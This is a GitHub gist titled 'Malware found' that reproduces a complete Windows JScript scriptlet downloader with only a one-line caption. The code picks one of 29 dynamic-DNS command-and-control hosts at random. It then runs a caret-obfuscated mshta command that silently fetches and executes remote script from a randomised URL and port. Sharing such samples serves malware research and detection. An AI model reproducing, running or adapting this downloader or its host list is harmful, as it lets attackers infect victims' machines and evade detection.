Skip to content

Instantly share code, notes, and snippets.

@msmarcal
Created May 21, 2018 22:46
Show Gist options
  • Save msmarcal/c23f1d7c0a20b99b081bdd5db9daf722 to your computer and use it in GitHub Desktop.
Save msmarcal/c23f1d7c0a20b99b081bdd5db9daf722 to your computer and use it in GitHub Desktop.
Malware found
<?XML version="1.0"?>
<scriptlet>
<registration
progid="erwergewtgsfwr"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
function fgrsetgesrvwgee(min, max)
{
return Math.round(Math.random()*(max-min)+min)
}
var xVRXastaroth;
var raknsdrxx;
var smaeVar;
var smaeVarTask;
var AppWshShell = new ActiveXObject("Scripting.FileSystemObject");
var WshShell = new ActiveXObject("WScript.Shell");
var xxWshShell = new ActiveXObject("WScript.Shell");
raknsdrxx = fgrsetgesrvwgee(1,29);
smaeVar = "01/";
if (raknsdrxx == 1)
{
xVRXastaroth = "laguerra.yourtrap.com";
}
if (raknsdrxx == 2)
{
xVRXastaroth = "jesse10.compress.to";
}
if (raknsdrxx == 3)
{
xVRXastaroth = "tuco-salamanca.dynamic-dns.net";
}
if (raknsdrxx == 4)
{
xVRXastaroth = "mike-ehrmantraut.wikaba.com";
}
if (raknsdrxx == 5)
{
xVRXastaroth = "carl-grimes.dumb1.com";
}
if (raknsdrxx == 6)
{
xVRXastaroth = "daryl-dixon.2waky.com";
}
if (raknsdrxx == 7)
{
xVRXastaroth = "glenn-rhee.fartit.com";
}
if (raknsdrxx == 8)
{
xVRXastaroth = "michonne.ddns.info";
}
if (raknsdrxx == 9)
{
xVRXastaroth = "negan.sellclassics.com";
}
if (raknsdrxx == 10)
{
xVRXastaroth = "rick-grimes.mrface.com";
}
if (raknsdrxx == 11)
{
xVRXastaroth = "maggie-greene.instanthq.com";
}
if (raknsdrxx == 12)
{
xVRXastaroth = "carol-peletier.mrbasic.com";
}
if (raknsdrxx == 13)
{
xVRXastaroth = "rosita-espinosa.zyns.com";
}
if (raknsdrxx == 14)
{
xVRXastaroth = "eugene-porter.qpoe.com";
}
if (raknsdrxx == 15)
{
xVRXastaroth = "morgan-jones.mymom.info";
}
if (raknsdrxx == 16)
{
xVRXastaroth = "jamesford.dynamic-dns.net";
}
if (raknsdrxx == 17)
{
xVRXastaroth = "katherine.epac.to";
}
if (raknsdrxx == 18)
{
xVRXastaroth = "jackshephard.longmusic.com";
}
if (raknsdrxx == 19)
{
xVRXastaroth = "sayidjarrah.compress.to";
}
if (raknsdrxx == 20)
{
xVRXastaroth = "johnlocke.wikaba.com";
}
if (raknsdrxx == 21)
{
xVRXastaroth = "hurleyreyes.zzux.com";
}
if (raknsdrxx == 22)
{
xVRXastaroth = "benjaminlinus.dumb1.com";
}
if (raknsdrxx == 23)
{
xVRXastaroth = "boonecarlyle.onedumb.com";
}
if (raknsdrxx == 24)
{
xVRXastaroth = "clairelittleton.youdontcare.com";
}
if (raknsdrxx == 25)
{
xVRXastaroth = "charliepace.yourtrap.com";
}
if (raknsdrxx == 26)
{
xVRXastaroth = "mrkowwiuy.dynamic-dns.net";
}
if (raknsdrxx == 27)
{
xVRXastaroth = "sunhwakwon.2waky.com";
}
if (raknsdrxx == 28)
{
xVRXastaroth = "michaeldawson.toythieves.com";
}
if (raknsdrxx == 29)
{
xVRXastaroth = "richardalpert.itemdb.com";
}
smaeVarTask = "ht'+'"+"tp://vhx666sast"+fgrsetgesrvwgee(1211111,9999999)+"."+xVRXastaroth+":"+fgrsetgesrvwgee(25010,25099)+"/excx/?"+fgrsetgesrvwgee(11112111,99989999);
WshShell.run("cmd /c m^s^h^t^a.e^xe j^av^as^cr^ipt^:tr^y{tr^y{ja^vasc^ri^pt:G^et^Obje^ct('s^cr^ipt:"+smaeVarTask+"434');se^lf.clo^se();}cat^ch(e){}}cat^ch(e){};se^lf.c^lose(); && exit",0,false);
]]>
</script>
</registration>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment